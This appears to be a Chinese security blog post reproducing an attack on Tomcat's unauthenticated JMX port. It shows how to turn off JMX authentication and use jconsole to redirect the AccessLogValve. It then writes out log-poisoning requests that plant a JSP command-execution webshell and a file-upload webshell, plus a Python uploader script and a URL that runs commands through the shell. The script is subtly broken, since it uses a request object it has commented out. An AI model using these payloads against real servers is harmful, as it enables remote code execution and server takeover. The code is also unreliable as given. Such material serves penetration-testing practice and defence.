Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

【漏洞复现】tomcat的JMX端口上传webshell

渗透测试 Adminxe 2038℃ 0评论

1、 配置tomcat启动jconsole到1099端口的配置:
参考文章:https://www.cnblogs.com/baihuitestsoftware/articles/6405580.html

//可以将其设置为无密码访问:

cd /opt/apache-tomcat-8.0.3/bin
vi catalina.sh
# OS specific support. $var _must_ be set to either true or false.添加如下变量:
CATALINA_OPTS="$JAVA_OPTS -Djava.rmi.server.hostname=192.168.1.100 
-Dcom.sun.management.jmxremote.port=1099 
-Dcom.sun.management.jmxremote.authenticate=false 
-Dcom.sun.management.jmxremote.ssl=false"

//重启tomcaty
./shutdown.sh
./startup.sh

2、 本地->运行输入:jconsole

//VM概要中获得tomcat的web主目录 :
Dcatalina.home=/opt/apache-tomcat-8.0.3

//获得/manager/html后台的访问密码:

//上传webshell:
MBeans->Catalina->Valve->localhost->AccessLogValue->操作 可以写入jsp后门:
../webapps/docs/test11.jsp //测试成功
/opt/apache-tomcat-8.0.3/webapps/docs/test11.jsp

//使用burpsuite写入cmd后门:
1)
GET /test?<%Runtime.getRuntime().exec(request.getParameter(“cmd”));%> HTTP/1.1
Host: 192.168.1.100:8080

2)

GET /test?<%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"></jsp:directive><jsp:directive.page import="java.io.OutputStream"></jsp:directive><jsp:directive.page import="java.io.FileOutputStream"></jsp:directive><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart"> HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.3.6000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Accept-Language: zh-CN
Cookie: JSESSIONID=FD5D2DAF6665FC4C3CC90C814757BF97
Connection: close
Content-Length: 2

 3)jmx.py webshell上传程序,解决了url编码问题:

#!/user/bin/env python
#coding=utf8
#auther:pt007@vip.sina.com
#jmx.py webshell上传程序,解决了url编码问题

import sys
import urlparse
import urllib2

if __name__ == '__main__':
   url = 'http://192.168.1.100:8080'
   reqBind='''/test?<%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">'''
   reqBind=reqBind.decode('utf-8')
   proxies={
           "http":"http://127.0.0.1:8080"
           }

   try:
      #print '[*]url=%s\n' %(url)
      print "\n[*]webshell:"
      print url+"/docs/test11.jsp"
      #url=url+reqBind
      '''
      request = urllib2.Request(url+reqBind)
      request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0')
      request.add_header('Accept-Language', 'en-us;q=0.5,en;q=0.3')
      request.add_header('Referer', request.get_full_url())
      '''
      u = urllib2.urlopen(request,timeout = 3)
      content = u.read()
      content = content.encode("utf-8")
      print "\n========================================================================================================="
      print "\n[*]response:\n"
      print content
      print "\n========================================================================================================="
   except Exception as e:
      print e

//访问webshell地址:
http://192.168.1.100:8080/docs/test11.jsp?cmd=id

参考链接:
https://www.anquanke.com/post/id/85442

转载请注明:Adminxe's Blog » 【漏洞复现】tomcat的JMX端口上传webshell

喜欢 (1)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址